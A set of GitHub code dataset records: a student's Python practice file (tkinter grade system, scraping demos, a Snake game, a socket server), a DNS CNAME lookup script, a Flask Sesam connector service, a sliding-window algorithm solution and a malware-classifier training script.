lb.place(x=20,y=80,width=60,height=120) \r\n def za(event):\r\n lb.place_forget()\r\n def we(event):\r\n value = lb.get(lb.curselection())\r\n var1.set(value)\r\n def sor(): \r\n try:\r\n sb=tk.Scrollbar(fr,orient=\"vertical\")\r\n sb.place(x=440,y=25,height=200)\r\n tx=tk.Canvas(fr,bg=\"#00f\")\r\n tx.place(x=80,y=25,width=360,height=200)\r\n ul=tk.Text(tx)\r\n ul.place(width=360,height=200)\r\n sb.config(command=ul.yview)\r\n ul.config(yscrollcommand=sb.set)\r\n \r\n hau=list(c.execute(\"select * from student order by {} desc\".format(var1.get())))\r\n a=list(c.execute(\"select count(学号) from student \"))\r\n for i in range(5):\r\n ul.insert(tk.END,'{0}'.format(tex[i]).center(8))\r\n ul.insert(tk.END,'\\n')\r\n for j in range(a[0][0]):\r\n for i in range(5):\r\n if i==0:ul.insert(tk.END,'{0}'.format(hau[j][i]).ljust(12))\r\n elif i==1:ul.insert(tk.END,'{0}'.format(hau[j][i]).ljust(12-len(hau[j][i])))\r\n else:ul.insert(tk.END,'{0}'.format(hau[j][i]).ljust(9))\r\n ul.insert(tk.END,'\\n')\r\n except:tk.messagebox.showwarning(title='警告', message='请选择排序方式!')\r\n l2=tk.Button(fr,textvariable=var1)\r\n l2.place(x=20,y=50) \r\n l2.bind(\"\", wa)\r\n l2.bind(\"\", za)\r\n lb = tk.Listbox(fr, listvariable=var2,width=20,height=10)\r\n lb.bind(\"\", wa)\r\n lb.bind(\"\", za) \r\n lb.bind('',we)\r\n s1=tk.Button(fr,text=\"排序\",activebackground='#0000a3',command=sor).place(x=120,y=250)\r\n s2=tk.Button(fr,text=\"结束\",activebackground='#0000a3',command=ha).place(x=200,y=250)\r\ndef dexit():\r\n display.ws.destroy()\r\n con.commit()\r\nclass window():\r\n ws=tk.Tk()\r\n frame = tk.Frame(ws)\r\n frame.pack()\r\n def __init__(self):\r\n self.ws.title('哈工大教务处学生成绩系统')\r\n self.ws.geometry('500x300')\r\n def users(self):\r\n l=tk.Label(self.frame,text='欢迎进入教务处学生成绩系统',fg=\"#fff\",bg='#00006e', font=('Microsoft Yahei UI', 12), width=30, height=2).pack()\r\n b1=tk.Button(self.frame,text=\"学生成绩录入\",font=('Microsoft Yahei UI', 
12),activebackground='red',width=10,height=1,command=entry).pack()\r\n b2=tk.Button(self.frame,text=\"学生信息修改\",font=('Microsoft Yahei UI', 12),activebackground='red',width=10,height=1,command=chansco).pack()\r\n b3=tk.Button(self.frame,text=\"查询学生成绩\",font=('Microsoft Yahei UI', 12),activebackground='red',width=10,height=1,command=check).pack()\r\n b4=tk.Button(self.frame,text=\"学生成绩排名\",font=('Microsoft Yahei UI', 12),activebackground='red',width=10,height=1,command=level).pack()\r\n b5=tk.Button(self.frame,text=\"退出\",font=('Microsoft Yahei UI', 12),activebackground='red',width=10,height=1,command=dexit).pack()\r\n self.ws.mainloop()\r\ncon=sq.connect(\"hit.db\")\r\nc=con.cursor()\r\ntex=(\"学号\",\"姓名\",\"语文\",\"英语\",\"数学\")\r\n#c.execute(create table student(学号 int primary key not null,姓名 text not null,语文 int,英语 int,数学 int);)\r\ncon.commit()\r\ndisplay=window()\r\ndisplay.users()\r\n'''\r\n#作业5-1\r\n\"\"\"\r\nclass person():\r\n name=''\r\n age=''\r\n def __init__(self):\r\n self.name=input(\"请输入姓名:\")\r\n self.age=input(\"请输入年龄:\")\r\n def getPay(self):\r\n pass\r\n def pri(x):\r\n def pr(self):\r\n print('姓名:',self.name)\r\n print('年龄:',self.age)\r\n x(self)\r\n return pr\r\nclass Manager(person):\r\n money=0\r\n def __init__(self):\r\n person.__init__(self)\r\n def getPay(self):\r\n self.money=500000\r\n @person.pri\r\n def pri(self): \r\n print('薪水:',self.money)\r\nclass Employee(person):\r\n salary=''\r\n year=''\r\n money=0\r\n def __init__(self):\r\n person.__init__(self)\r\n self.salary=int(input(\"请输入月薪:\"))\r\n self.year=int(input(\"请输入年终奖:\"))\r\n def getPay(self):\r\n self.money=self.salary*12+self.year\r\n @person.pri\r\n def pri(self): \r\n print('薪水:',self.money)\r\nclass Salesman(person):\r\n salary=''\r\n profit=''\r\n money=0\r\n def __init__(self):\r\n person.__init__(self)\r\n self.salary=int(input(\"请输入月薪:\"))\r\n self.profit=int(input(\"请输入销售利润:\"))\r\n def getPay(self):\r\n self.money=int(self.salary*12+self.profit*0.15)\r\n @person.pri\r\n def pri(self): \r\n print('薪水:',self.money)\r\nwhile(1):\r\n try:\r\n job=input('请输入职务: ')\r\n if job=='Manager':man=Manager()\r\n elif job=='Employee':man=Employee()\r\n elif job=='Salesman':man=Salesman()\r\n man.getPay()\r\n man.pri()\r\n except NameError:print('请输入正确的职务(Manager\\Employee\\Salesman)')\r\n\"\"\"\r\n#beautiful soup\r\n\"\"\"\r\nfrom bs4 import BeautifulSoup as bs\r\nimport re\r\nhtm= \r\nThe Dormouse's story\r\n\r\n

</title></head>\r\n<body>\r\n<p class=\"title\"><b>The Dormouse's story</b></p>\r\n\r\n<p class=\"story\">Once upon a time there were three little sisters; and their names were\r\n<a href=\"http://example.com/elsie\" class=\"sister\" id=\"link1\">Elsie</a>,\r\n<a href=\"http://example.com/lacie\" class=\"sister\" id=\"link2\">Lacie</a> and\r\n<a href=\"http://example.com/tillie\" class=\"sister\" id=\"link3\">Tillie</a>;\r\nand they lived at the bottom of a well.</p>\r\n\r\n<p class=\"story\">...</p>
\r\n\r\n\r\nso=bs(htm,'html.parser')\r\n#print(so.prettify())\r\n#beautifulsoup1\r\n\r\nprint(so.title)\r\nprint(so.title.name)\r\nprint(so.title.string)\r\nprint(so.a.parent.name)\r\nprint(so.p['class'])\r\nprint(so.p.attrs)\r\nso.a.string.replace_with(\"233\")\r\nx=iter(so.find_all('a'))\r\nfor i in range(len(so.find_all('a'))):print(next(x))\r\nso.p['id']='ha'\r\nprint(so.p.attrs)\r\n\r\nprint(so.a.string)\r\nprint(so.name)\r\nprint('--------------------------------------------------')\r\nfor i in range(len(so.contents)):print(so.contents[i])\r\nprint(23)\r\nhe=so.body\r\nti=he.contents[0]\r\nprint(he)\r\nfor i in he.children:print(i)\r\nprint(\"-----------\")\r\ns=so.head\r\nfor i in he.descendants:print(i)\r\nprint(23)\r\nfor i in so.strings:print(repr(i))\r\nfor i in so.stripped_strings:print(repr(i))\r\n\r\n#beautiuflsoup2\r\n\r\nt=so.title\r\nprint(t.string.parent)\r\nprint(so.parent)\r\nfor i in so.a.parents:print(i.name)\r\nll=bs(\"text1text2\",'html.parser')\r\nprint(ll.prettify())\r\nprint(ll.b.next_sibling)\r\nprint(ll.c.previous_sibling)\r\nprint(\"-----------\")\r\nsl=so.find(\"a\",id='link3')\r\nprint(sl)\r\nprint(sl.next_sibling)\r\nprint(sl.next_element)\r\nprint(sl.previous_sibling)\r\nprint(sl.previous_element)\r\nprint(\"______________\")\r\nimport re\r\nprint(so.find_all(\"a\"))\r\nprint(23)\r\nprint(so.a.name)\r\nfor i in so.find_all(re.compile(\"t\")):print(i.name)\r\n#print(so.find_all(re.compile(\"^b\")))\r\nfor i in so.find_all([\"a\",\"b\"]):print(i.previous_element)\r\nprint(\"-------------------\")\r\nfor i in so.find_all(True):print(i.string)\r\nprint(so(\"a\"))\r\nprint(so.find(\"a\"))\r\n\r\nprint(so.select(\".sister\"))\r\n\r\n\"\"\"\r\n#urlib\r\n\"\"\"\r\nimport urllib.request\r\n#response=urllib.request.urlopen('https://www.python.org') #请求站点获得一个HTTPResponse对象\r\n#print(response.read().decode('utf-8')) #返回网页内容\r\n#print(response.getheader('server')) #返回响应头中的server值\r\n#print(response.getheaders()) #以列表元祖对的形式返回响应头信息\r\n#print(response.fileno()) #返回文件描述符\r\n#print(response.version) #返回版本信息\r\n#print(response.status) #返回状态码200,404代表网页未找到\r\n#print(response.debuglevel) #返回调试等级\r\n#print(response.closed) #返回对象是否关闭布尔值\r\n#print(response.geturl()) #返回检索的URL\r\n#print(response.info()) #返回网页的头信息\r\n#print(response.getcode()) #返回响应的HTTP状态码\r\n#print(response.msg) #访问成功则返回ok\r\n#print(response.reason) #返回状态信息\r\n\r\nfrom urllib.request import urlopen\r\nimport urllib.parse\r\n\r\ndata = bytes(urllib.parse.urlencode({'word':'hello'}),encoding='utf-8') \r\n#data需要字节类型的参数,使用bytes()函数转换为字节,使用urllib.parse模块里的urlencode()方法来讲参数字典转换为字符串并指定编码\r\nresponse = urlopen('http://httpbin.org/post',data=data)\r\nprint(response.read())\r\nprint(type(response))\r\n\"\"\"\r\n#requests\r\nimport requests\r\n'''\r\nurl = 'https://www.runoob.com/w3cnote/python-spider-intro.html'\r\nr = requests.get(url)\r\nprint(type(r)) # 类型是str(JSON格式)\r\nprint(r.status_code)\r\nprint(\"--------\")\r\nprint(r.text)\r\nprint(\"--------\")\r\nprint(r.cookies)\r\n'''\r\n\"\"\"\r\nr = requests.get(\"http://github.com/favicon.ico\")\r\nprint(r.text)\r\nprint(r.content)\r\n# 保存图片\r\nwith open('favicon.ico','wb') as f:\r\n f.write(r.content)\r\n\"\"\"\r\n\"\"\"\r\nfrom bs4 import BeautifulSoup as bs\r\nimport re\r\nimport json\r\nur2 = 'https://www.runoob.com/w3cnote/python-spider-intro.html'\r\n\r\n#print(r.json().load())\r\n#so=bs(r.text,'html.parser')\r\n\r\ndata = {\r\n 'name': 'germey',\r\n 'age': 22\r\n}\r\nurl = 'http://httpbin.org/get'\r\n#r = requests.get(ur2,params=data)\r\nr1 = requests.post(url, 
params=data)\r\nr2 = requests.get(url)\r\n\r\n#print(r1.json())\r\nprint(r1.text)\r\nprint(r2.status_code)\r\nprint(\"______________\")\r\nprint(r2.headers)\r\nprint(\"______________\")\r\nprint(r2.cookies)\r\nprint(\"______________\")\r\nprint(r2.history)\r\n#v=so.find_all(\"a\")\r\n#x=iter(v)\r\n#for i in so.find_all(\"a\"):\r\n #print(i.string)\r\n\"\"\"\r\n\"\"\"\r\n#贪吃蛇\r\nimport tkinter as tk\r\nimport random as rd\r\nimport time as tm\r\nimport tkinter.messagebox \r\n\r\nws=tk.Tk()\r\nws.geometry(\"500x500\")\r\nws.title(\"Snake\")\r\n\r\nfr=tk.Frame(ws,width=500,height=500)\r\nfr.pack()\r\n\r\ndef start():\r\n fr.pack_forget()\r\n mygame=gameview()\r\n\r\ntitle=tk.Label(fr,text=\"贪吃蛇\",font=('Arial', 44)).place(x=180,y=100)\r\n \r\nplay=tk.Button(fr,text=\"Play\",command=start)\r\nplay.place(x=250,y=250)\r\n\r\nclass gameview():\r\n def __init__(self):\r\n self.x=rd.randrange(0,191,10)\r\n self.y=rd.randrange(0,91,10)\r\n\r\n self.snakelist=[0]\r\n self.listx=[self.x]\r\n self.listy=[self.y]\r\n\r\n self.a=rd.randrange(0,91,10)\r\n self.b=rd.randrange(0,91,10)\r\n\r\n print(self.x,self.y,self.a,self.b)\r\n self.i=1\r\n self.j=0\r\n \r\n self.ifmove=False\r\n\r\n self.var1=\"233\"\r\n \r\n self.main=tk.Frame(ws)\r\n self.main.pack(fill=\"both\",expand=True)\r\n \r\n self.border=tk.Canvas(self.main,bg=\"#000\",width=500,height=400)\r\n \r\n self.snake=self.border.create_rectangle(self.x,self.y,self.x+10,self.y+10,fill=\"#0ff\")\r\n self.food=self.border.create_rectangle(self.a,self.b,self.a+10,self.b+10,fill=\"#f00\")\r\n \r\n self.border.pack()\r\n\r\n def end():\r\n self.main.pack_forget()\r\n fr.pack()\r\n\r\n self.over=tk.Button(self.main,text=\"end\",command=end)\r\n self.over.place(x=250,y=450)\r\n\r\n self.text1=tk.StringVar()\r\n self.text1.set(\"Play\")\r\n\r\n self.text2=tk.StringVar()\r\n self.text2.set(\"0\")\r\n\r\n self.score=tk.Label(self.main,text=\"Score:\").place(x=100,y=450)\r\n self.myscore=tk.Label(self.main,textvariable=self.text2).place(x=140,y=450)\r\n \r\n def timeflood():\r\n while(self.ifmove): \r\n self.border.move(self.snake,10*self.i,10*self.j)\r\n self.listx[0]+=10*self.i\r\n self.listy[0]+=10*self.j\r\n print(\"当前头部位置:\",self.listx[0],self.listy[0])\r\n\r\n if(len(self.listx)>2):\r\n for k in range(len(self.listx)-1):\r\n self.listx[k+1]+=10*self.i\r\n self.listy[k+1]+=10*self.j \r\n prex=tuple(self.listx)\r\n prey=tuple(self.listy) \r\n \r\n for k in range(len(self.snakelist)-1):\r\n #self.border.move(self.snakelist[k+1],10*self.prei,10*self.prej)\r\n self.border.coords(self.snakelist[k+1],prex[k]-10*self.i,prey[k]-10*self.j,prex[k]+10*(1-self.i),prey[k]+10*(1-self.j))\r\n self.listx[k+1]=prex[k]-10*self.i\r\n self.listy[k+1]=prey[k]-10*self.j\r\n\r\n print(\"当前身子%d位置:\"%(k+1),self.listx[k+1],self.listy[k+1])\r\n \r\n eat()\r\n\r\n tm.sleep(0.4)\r\n ws.update()\r\n\r\n boun()\r\n boom()\r\n \r\n def ifplay():\r\n self.ifmove=not self.ifmove\r\n if self.ifmove:self.text1.set(\"Pause\")\r\n else:self.text1.set(\"Continue\")\r\n print(self.text1)\r\n \r\n if self.var1==\"replay\":\r\n self.var1='233'\r\n\r\n self.border.delete(\"all\")\r\n \r\n self.x=rd.randrange(0,191,10)\r\n self.y=rd.randrange(0,91,10)\r\n\r\n self.a=rd.randrange(0,191,10)\r\n self.b=rd.randrange(0,91,10)\r\n\r\n self.snake=self.border.create_rectangle(self.x,self.y,self.x+10,self.y+10,fill=\"#0ff\")\r\n self.food=self.border.create_rectangle(self.a,self.b,self.a+10,self.b+10,fill=\"#f00\")\r\n\r\n self.snakelist=[0]\r\n self.listx=[self.x]\r\n self.listy=[self.y]\r\n \r\n 
self.text2.set('0')\r\n            self.text1.set(\"Continue\")\r\n            self.ifmove=False\r\n            \r\n            timeflood()    \r\n        \r\n        self.start=tk.Button(self.main,textvariable=self.text1,command=ifplay)\r\n        self.start.place(x=350,y=450)\r\n\r\n        def up(event):\r\n            if self.ifmove==True:    \r\n                self.i=0\r\n                self.j=-1\r\n            \r\n        def down(event):\r\n            if self.ifmove==True:\r\n                self.i=0\r\n                self.j=1\r\n            \r\n        def left(event):\r\n            if self.ifmove==True:    \r\n                self.i=-1\r\n                self.j=0\r\n            \r\n        def right(event):\r\n            if self.ifmove==True:\r\n                self.i=1\r\n                self.j=0\r\n            \r\n        ws.bind(\"<Up>\",up)\r\n        ws.bind(\"<Down>\",down)\r\n        ws.bind(\"<Right>\",right)\r\n        ws.bind(\"<Left>\",left)\r\n\r\n        def fooding():\r\n            self.a=rd.randrange(0,191,10)\r\n            self.b=rd.randrange(0,91,10)\r\n            return (self.a,self.b,self.a+10,self.b+10)\r\n        def eat():\r\n            if self.listx[0]==self.a and self.listy[0]==self.b:\r\n                print(23)\r\n                self.border.coords(self.food,fooding())\r\n                print(2,self.a,self.b)\r\n                lenth()\r\n        def lenth():\r\n            k=len(self.snakelist)-1\r\n            print(\"当前身子长度%d\"%(k+2))\r\n            self.snakelist.append(self.border.create_rectangle(self.listx[k]-10*self.i,self.listy[k]-10*self.j,self.listx[k]+10*(1-self.i),self.listy[k]+10*(1-self.j),fill=\"#f0f\"))\r\n\r\n            self.text2.set(str(len(self.snakelist)-1))\r\n            \r\n            self.listx.append(self.listx[k]-10*self.i)\r\n            self.listy.append(self.listy[k]-10*self.j)\r\n            print(\"身体生成于:\",self.listx[k]-10*self.i,self.listy[k]-10*self.j)\r\n\r\n        def boun():\r\n            if (self.listx[0]<0 or self.listx[0]>=500 or self.listy[0]<0 or self.listy[0]>=400):\r\n                tk.messagebox.showwarning(title='失败', message='游戏结束')\r\n                self.var1=\"replay\"\r\n                self.ifmove=False\r\n                self.text1.set(self.var1)\r\n\r\n        def boom():\r\n            for k in range(len(self.snakelist)-1):\r\n                if (self.listx[0]==self.listx[k+1] and self.listy[0]==self.listy[k+1]):\r\n                    print(23)\r\n                    tk.messagebox.showwarning(title='失败', message='游戏结束')\r\n                    self.var1=\"replay\"\r\n                    self.ifmove=False\r\n                    self.text1.set(self.var1)\r\n\"\"\"\r\n#socket\r\n\r\nimport socket \r\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\nhost=socket.gethostname()\r\nprint(host)\r\ns.bind(('127.0.0.1',9092))# 127.0.0.1 is the loopback IP: the machine connecting to itself\r\ns.listen(5)\r\nprint(\"23333\")\r\n\r\nwhile True:\r\n    sock,addr=s.accept() # sock is the actual data channel for this client\r\n    print(\"连接地址: %s\" % str(addr))\r\n    data=sock.recv(1024)\r\n    print(data)\r\n    sock.send(\"hahahhaah\".encode())\r\n    #sock.close()\r\n","repo_name":"Rubus-LF/teachsay","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":41360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"25454492074","text":"#!/bin/python3\n\nimport sys\nimport dns.resolver as dnsr\n\n#Example: python3 dnsSubdomainScanner.py \"mail.google.com\"\n\ndef show_subdomains(target):\n\tcname_list = dnsr.resolve(target, 'CNAME')\n\tif len(cname_list) > 0:\n\t\tprint(\"Subdomains:\")\n\t\ti = 1\n\t\tfor item in cname_list:\n\t\t\tprint(f\"{i}) {item.target}\")\n\t\t\ti += 1\n\telse:\n\t\tprint(\"No subdomains found\")\n\ndef main():\n\ttry:\n\t\tif len(sys.argv) == 2:\n\t\t\ttarget = str(sys.argv[1])\n\t\t\tshow_subdomains(target)\n\t\telse:\n\t\t\tprint(\"Wrong number of arguments\")\n\t\t\tprint(\"Template: python3 dnsSubdomainScanner.py <target>\")\n\texcept Exception as e:\n\t\tprint(f\"Error: {e}\")\n\t\t\nmain()\n\n","repo_name":"dadallles/Basic-Tools","sub_path":"dnsSubdomainScanner/dnsSubdomainScanner.py","file_name":"dnsSubdomainScanner.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
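The test.py record above ends with a blocking TCP server bound to 127.0.0.1:9092. A minimal client sketch to exercise it, assuming that server is already running locally; the message payload here is illustrative and not from either repo:

```python
# Hypothetical client for the loopback server at the end of test.py above.
# Assumes the server is listening on 127.0.0.1:9092 as written there.
import socket

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # TCP socket
client.connect(('127.0.0.1', 9092))    # same loopback address/port the server binds
client.send('hello'.encode())          # sockets carry bytes, so encode the str first
reply = client.recv(1024)              # read the server's canned reply
print(reply.decode())
client.close()
```

The same bytes-not-str rule applies on the server side of the connection, which is why its reply string must be encoded before `sock.send()`.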
+{"seq_id":"34750615445","text":"from flask import Flask, request, jsonify, Response\nimport json\nimport requests\nimport logging\nimport os\nimport sys\nfrom datahubs.sesam import create_pipe, create_system, get_all_input_pipes, create_global, create_pipe_with_fkey_ni, create_pipe_with_idx_ni, get_all_pipes, get_global_pipe_config\nfrom processing.mysql import connect_to_db as mysql_db\nfrom processing.oracle import connect_to_db as oracle_db\nfrom processing.postgres import connect_to_db as postgres_db\nfrom processing.mssql import connect_to_db as mssql_db\nfrom flask_cors import CORS, cross_origin\nfrom sesamutils import VariablesConfig, sesam_logger\nimport urllib3\n\nurllib3.disable_warnings()\napp = Flask(__name__)\n\n## Helpers\nlogger = sesam_logger(\"Steve the logger\", app=app)\nCORS(app,\n resources={r\"/*\": {\n \"origins\": \"*\"\n }},\n headers={\n 'Access-Control-Request-Headers', 'Content-Type',\n 'Access-Control-Allow-Origin'\n })\n\nconnecting_params = None\nsesam_response = None\ndatahub_config_and_tables = None\nfkey_relations = None\nindex_relations = None\n\n## Logic for running program in dev\ntry:\n with open(\"./backend/helpers.json\", \"r\") as stream:\n logger.info(\"Using env vars defined in helpers.json\")\n env_vars = json.load(stream)\n os.environ['sesam_jwt'] = env_vars['sesam_jwt']\n os.environ['sesam_base_url'] = env_vars['sesam_base_url']\nexcept OSError as e:\n logger.info(\"Using env vars defined in SESAM\")\n##\n \nrequired_env_vars = ['sesam_jwt', 'sesam_base_url']\noptional_env_vars = [\"Denmark_is_here\"]\nsesam_jwt = os.getenv('sesam_jwt')\nbase_url = os.getenv('sesam_base_url')\n\n@app.route('/')\ndef index():\n output = {\n 'service': 'Autoconnect up and running',\n 'remote_addr': request.remote_addr\n }\n\n return jsonify(output)\n\n\n## Get connection parameters for db connection and saving them to global variable \"connecting_params\"\n@app.route('/connectors', methods=['POST'])\n@cross_origin()\ndef get_connectors():\n global connecting_params\n connectors = request.json\n connecting_params = connectors\n return jsonify({\"parameters\": \"committed\"})\n\n\n## Create dataflow excluding globals and check for fkey_relations or index_relations.\n@app.route('/create_dataflow', methods=['POST'])\n@cross_origin()\ndef create_dataflow():\n ## Validating env vars\n config = VariablesConfig(required_env_vars, optional_env_vars)\n if not config.validate():\n sys.exit(1)\n\n # Variables\n sesam_system_response = None\n sesam_pipe_response = None\n global datahub_config_and_tables\n global sesam_response\n global fkey_relations\n global index_relations\n connectors = request.json\n pipes = connectors['tables']\n\n #creating system\n sesam_system_response = create_system(connecting_params, sesam_jwt, base_url)\n if sesam_system_response != \"Your system has been created\":\n sesam_system_response = \"Your system could not be created. 
Make sure your provided SESAM variables are correct\"\n\n #creating pipes with or without relations\n pipes_to_create = []\n for pipe in pipes:\n pipes_to_create.append(pipe['name'])\n\n remaining_table_relations = []\n if fkey_relations != []:\n for table in pipes_to_create:\n for fkey_table in fkey_relations:\n if table == fkey_table[0]:\n remaining_table_relations.append(fkey_table)\n\n for ni_relation in remaining_table_relations:\n if ni_relation[0] in pipes_to_create:\n pipes_to_create.remove(ni_relation[0])\n\n create_pipe_with_fkey_ni(connecting_params, remaining_table_relations, sesam_jwt, base_url)\n # remaining tables without ni's\n sesam_pipe_response = create_pipe(\n connecting_params, pipes_to_create,\n sesam_jwt,\n base_url)\n if sesam_pipe_response != \"Pipes created\":\n sesam_pipe_response = \"Your pipes could not be created. Make sure your provided SESAM variables are correct\"\n\n if index_relations != []:\n for table in pipes_to_create:\n for fkey_table in index_relations:\n if table == list(fkey_table[0].keys())[0] and list(fkey_table[0].keys())[0] not in remaining_table_relations:\n remaining_table_relations.append(fkey_table)\n\n for ni_relation in remaining_table_relations:\n if list(ni_relation[0].keys())[0] in pipes_to_create:\n pipes_to_create.remove(list(ni_relation[0].keys())[0])\n\n create_pipe_with_idx_ni(connecting_params, remaining_table_relations, sesam_jwt, base_url)\n # remaining tables without ni's\n sesam_pipe_response = create_pipe(\n connecting_params, pipes_to_create,\n sesam_jwt,\n base_url)\n if sesam_pipe_response != \"Pipes created\":\n sesam_pipe_response = \"Your pipes could not be created. Make sure your provided SESAM variables are correct\"\n\n if index_relations == [] and fkey_relations == []:\n sesam_pipe_response = create_pipe(\n connecting_params, pipes_to_create,\n sesam_jwt,\n base_url)\n if sesam_pipe_response != \"Pipes created\":\n sesam_pipe_response = \"Your pipes could not be created. Make sure your provided SESAM variables are correct\"\n\n sesam_response = {\n \"sesam_result\": \"Your system and pipes have been created! 
;)\"\n }\n return {\n \"system_result\": sesam_system_response,\n \"pipe_result\": sesam_pipe_response\n }\n\n\n## Get initial scan of db, get relations and write to globals [fkey_relations, index_relations]\n@app.route('/scan_db', methods=['GET', 'POST'])\n@cross_origin()\ndef get_db_data():\n global connecting_params\n global fkey_relations\n global index_relations\n fkey_query_relations = None\n index_query_relations = None\n table_result = None\n tables = []\n pkeys = []\n option = connecting_params['option']\n connecting_params[\"dbase\"] = connecting_params[\"dbase\"].lower()\n\n try:\n if option[0] == \"Foreign Key references\" or option == \"Foreign Key references\":\n option = \"Fkey\"\n if option[0] == \"Index references\" or option == \"Index references\":\n option = \"Index\"\n except:\n tables = \"Not working\"\n \n if connecting_params[\"dbase\"] == \"mysql\":\n table_result, fkey_query_relations, index_query_relations = mysql_db(\n connecting_params, option)\n if connecting_params[\"dbase\"] == \"postgresql\":\n table_result, fkey_query_relations, index_query_relations = postgres_db(\n connecting_params, option)\n if connecting_params[\"dbase\"] == \"oracle\":\n table_result, fkey_query_relations, index_query_relations = oracle_db(\n connecting_params, option)\n if connecting_params[\"dbase\"] == \"mssql\":\n table_result, fkey_query_relations, index_query_relations = mssql_db(\n connecting_params, option)\n\n fkey_relations = fkey_query_relations\n index_relations = index_query_relations\n\n if table_result == None:\n tables = \"Not working\"\n\n if tables != \"Not working\" and len(table_result) != 0:\n index_value = 1\n for table, pkey in table_result:\n tables.append({\"id\": index_value, \"name\": table, \"groupId\": 1})\n pkeys.append(pkey)\n index_value = index_value + 1\n\n return {\"result\": tables}\n\n\n## General response...\n@app.route('/sesam_response', methods=['GET'])\ndef sesam_result():\n global sesam_response\n return sesam_response\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000, debug=True, threaded=True)","repo_name":"JonasAls89/autoconnect","sub_path":"app/backend/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":7649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74342595022","text":"'''\n0. 완전탐색을 할 줄 안다. 완전탐색을 응용해서 문제를 해결할 수 있다.\n1. 전체 날짜 수가 100000까지 있으므로 아이디어 싸움이다.\n2. 첫번째 경우만 sum 해준다.\n3. 
From then on, drop the front element and add the element K positions ahead (sliding window).\n'''\n\nN, K = map(int, input().split()) # total number of days, number of consecutive days\ntem_lst = list(map(int, input().split()))\nsum_lst = []\ntemp = sum(tem_lst[:K])\nsum_lst.append(temp)\nfor x in range(N-K):\n    temp -= (tem_lst[x] - tem_lst[x+K])\n    sum_lst.append(temp)\nans = max(sum_lst)\nprint(ans)","repo_name":"hyoonpark/Algorithm","sub_path":"BOJ/BOJ_2559_수열.py","file_name":"BOJ_2559_수열.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"21356080627","text":"from cnn import CNN_MAL\nfrom rnn import RNN_MAL\nfrom gnn import GNN_MAL\nimport config\nimport pickle\nimport glob\nimport numpy as np\nimport tensorflow as tf\nfrom text_iterator import text_iterator\nfrom graph_iterator import *\nfrom tf_utils import check_distribution\n#print(tf.executing_eagerly())\n\ndef prepare_data_image(tensor = True):\n    with open(config.CFG_split_data, 'rb') as jf:\n        train_set, test_set, train_lbs, test_lbs = pickle.load(jf)\n    b = glob.glob('data/L/Benign/*')\n    v = glob.glob('data/L/Virus/*')\n    alls = b + v\n    check_distribution(train_set, alls)\n    check_distribution(test_set, alls)\n    train_set = [alls[f] for f in train_set]\n    test_set = [alls[f] for f in test_set]#[:50]\n    check_distribution(train_set)\n    check_distribution(test_set)\n    def _parsefunc(filename, lbs):\n        img_st = tf.io.read_file(filename)\n        img_dec = tf.io.decode_png(img_st, channels=config.channel)\n        img = tf.cast(img_dec,tf.float32)/255.\n        img = tf.image.resize(img, [config.img_height, config.img_height],method='bilinear')\n        return img, lbs\n    def convert_dataset(train_set, train_lbs, _parsefunc, batch_size=config.batch_size):\n        AUTOTUNE = tf.data.experimental.AUTOTUNE\n        ds = tf.data.Dataset.from_tensor_slices((train_set, train_lbs))\n        train_ds = ds.map(_parsefunc)\n        train_ds = train_ds.batch(batch_size)\n        train_ds = train_ds.cache().shuffle(1000).prefetch(buffer_size=AUTOTUNE)\n        return train_ds\n    return convert_dataset(train_set, train_lbs, _parsefunc), convert_dataset(test_set, test_lbs, _parsefunc, 1)\n    \n\ndef prepare_data_txt():\n    with open(config.CFG_split_data, 'rb') as jf:\n        train_set, test_set, _, _ = pickle.load(jf)\n    b = glob.glob('data/Seq-ori/Benign/*')\n    v = glob.glob('data/Seq-ori/Virus/*')\n    alls = b + v\n    check_distribution(train_set, alls)\n    check_distribution(test_set, alls)\n    train_set = [alls[f] for f in train_set]\n    test_set = [alls[f] for f in test_set]#[:50]\n    check_distribution(train_set)\n    check_distribution(test_set)\n    print(len(train_set), len(test_set))\n    train_ds = text_iterator(train_set, 1, config.batch_size)\n    test_ds = text_iterator(test_set, 1, config.batch_size, shuffle=False)\n    return train_ds, test_ds\n\ndef prepare_data_graph():\n    with open(config.graph_data, 'rb') as jf:\n        g_list = pickle.load(jf)\n    with open(config.CFG_split_data, 'rb') as jf:\n        train_set, test_set, _, _ = pickle.load(jf)\n    print(len(train_set), len(test_set))\n    return [g_list[i] for i in train_set], [g_list[i] for i in test_set] \n\ndef cnn_model(load=\"\"):\n    model = CNN_MAL(config.num_classes)\n    model.compile(optimizer='adam',\n              loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n              metrics=['accuracy'])\n    if load!=\"\":\n        _, ckpt_manager = load_ckpt(model, config.model_save_path+load+'/')\n    return model\n\ndef rnn_model(name,load=\"\"):\n    model = RNN_MAL(config.num_classes, name)\n    model.compile(optimizer='adam',\n          loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n          metrics=['acc']) \r\n    
